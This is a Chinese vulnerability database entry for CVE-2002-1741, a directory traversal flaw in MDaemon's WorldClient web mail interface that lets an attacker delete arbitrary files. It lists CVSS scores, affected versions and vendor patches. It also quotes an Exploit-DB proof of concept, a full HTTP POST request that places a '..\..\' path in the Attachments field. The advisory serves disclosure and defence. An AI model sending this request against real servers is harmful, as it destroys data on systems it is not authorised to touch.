CVE-2002-1741
CVSS7.2
发布时间 :2002-12-31 00:00:00
修订时间 :2008-09-05 16:31:23
NMCOE    

[原文]Directory traversal vulnerability in WorldClient.cgi in WorldClient for Alt-N Technologies MDaemon 5.0.5.0 and earlier allows local users to delete arbitrary files via a ".." (dot dot) in the Attachments parameter.


[CNNVD]WorldClient任意文件可删除漏洞(CNNVD-200212-467)

        
        WorldClient是一款集成于MDaemon邮件服务器的WEB接口,可使用于Microsft Windows操作系统下。
        WorldClient对用户提交的输入数据缺少正确充分的检查,可导致远程攻击者可删除系统上任意文件。
        当建立新的邮件信息时,用户可以夹带附件,附件存储在用户文件夹中,由于WorldClient在删除附件操作时没有对用户提交的数据进行正确检查,攻击者可以提交包含"../"的特殊数据导致脱离用户文件夹的限制,而以MDaemon进程权限删除系统上任意文件。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:alt-n:worldclient:5.0.4
cpe:/a:alt-n:worldclient:5.0
cpe:/a:alt-n:worldclient:5.0.1
cpe:/a:alt-n:worldclient:5.0.3
cpe:/a:alt-n:worldclient:5.0.5
cpe:/a:alt-n:worldclient:5.0::pro
cpe:/a:alt-n:worldclient:5.0.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1741
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1741
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200212-467
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/9027
(PATCH)  XF  mdaemon-worldclient-delete-files(9027)
http://www.securityfocus.com/bid/4687
(PATCH)  BID  4687

- 漏洞信息

WorldClient任意文件可删除漏洞
高危 输入验证
2002-12-31 00:00:00 2007-04-27 00:00:00
远程  
        
        WorldClient是一款集成于MDaemon邮件服务器的WEB接口,可使用于Microsft Windows操作系统下。
        WorldClient对用户提交的输入数据缺少正确充分的检查,可导致远程攻击者可删除系统上任意文件。
        当建立新的邮件信息时,用户可以夹带附件,附件存储在用户文件夹中,由于WorldClient在删除附件操作时没有对用户提交的数据进行正确检查,攻击者可以提交包含"../"的特殊数据导致脱离用户文件夹的限制,而以MDaemon进程权限删除系统上任意文件。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 对WorldClient系统实行访问控制,只允许可信用户访问。
        厂商补丁:
        Deerfield
        ---------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Deerfield Worldclient Pro 5.0:
        Deerfield Upgrade md506_en.exe
        ftp://ftp.altn.com/MDaemon/Release/md506_en.exe
        英语版本
        Deerfield Upgrade md506_ge.exe
        ftp://ftp.altn.com/MDaemon/Release/md506_ge.exe
        德语版本
        Deerfield Worldclient 5.0:
        Deerfield Upgrade md506_en.exe
        ftp://ftp.altn.com/MDaemon/Release/md506_en.exe
        英文版本
        Deerfield Upgrade md506_ge.exe
        ftp://ftp.altn.com/MDaemon/Release/md506_ge.exe
        德语版本
        Deerfield Worldclient 5.0.1:
        Deerfield Upgrade md506_en.exe
        ftp://ftp.altn.com/MDaemon/Release/md506_en.exe
        英文版本
        Deerfield Upgrade md506_ge.exe
        ftp://ftp.altn.com/MDaemon/Release/md506_ge.exe
        德语版本
        Deerfield Worldclient 5.0.2:
        Deerfield Upgrade md506_en.exe
        ftp://ftp.altn.com/MDaemon/Release/md506_en.exe
        英文版本
        Deerfield Upgrade md506_ge.exe
        ftp://ftp.altn.com/MDaemon/Release/md506_ge.exe
        德语版本
        Deerfield Worldclient 5.0.3:
        Deerfield Upgrade md506_en.exe
        ftp://ftp.altn.com/MDaemon/Release/md506_en.exe
        英文版本
        Deerfield Upgrade md506_ge.exe
        ftp://ftp.altn.com/MDaemon/Release/md506_ge.exe
        德语版本
        Deerfield Worldclient 5.0.4:
        Deerfield Upgrade md506_en.exe
        ftp://ftp.altn.com/MDaemon/Release/md506_en.exe
        英文版本
        Deerfield Upgrade md506_ge.exe
        ftp://ftp.altn.com/MDaemon/Release/md506_ge.exe
        德语版本
        Deerfield Worldclient 5.0.5:
        Deerfield Upgrade md506_en.exe
        ftp://ftp.altn.com/MDaemon/Release/md506_en.exe
        英文版本
        Deerfield Upgrade md506_ge.exe
        ftp://ftp.altn.com/MDaemon/Release/md506_ge.exe
        德语版本

- 漏洞信息 (21438)

WorldClient 5.0.x Arbitrary File Deletion Vulnerability (EDBID:21438)
windows remote
2002-05-07 Verified
0 Obscure
N/A [点击下载]
source: http://www.securityfocus.com/bid/4687/info

WorldClient is a web interface packaged with MDaemon, an email server for Microsoft Windows.

An input validation vulnerability exists in WorldClient that allows for an attacker to delete an arbitrary file on the webserver that it resides on. The vulnerability is due to a lack of input validation on the supplied filename for an attachment delete operation. 

The following HTTP request demonstrates exploitation of this vulnerability to delete '..\..\test.txt':

POST /WorldClient.cgi?Session=xxxx&View=Compose-Attach HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://victom.com:3001/WorldClient.cgi?Session=xxxx&View=Options-Folders
Content-Type: multipart/form-data; boundary=---------------------------7d2851b9074c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)
Host: victim:3001
Content-Length: 407
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: User=MDaemon; Lang=en; Theme=Standard; Session=xxxx

-----------------------------7d2851b9074c
Content-Disposition: form-data; name="Attachment"; filename=""
Content-Type: application/octet-stream

-----------------------------7d2851b9074c
Content-Disposition: form-data; name="Attachments"

..\..\test.txt
-----------------------------7d2851b9074c
Content-Disposition: form-data; name="Remove"

Remove
-----------------------------7d2851b9074c--

		

- 漏洞信息

31774
MDaemon WorldClient WorldClient.cgi Attachments Traversal Arbitrary File Deletion
Remote / Network Access Denial of Service, Input Manipulation
Loss of Availability
Exploit Public

- 漏洞描述

- 时间线

2002-05-07 Unknow
2002-05-07 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站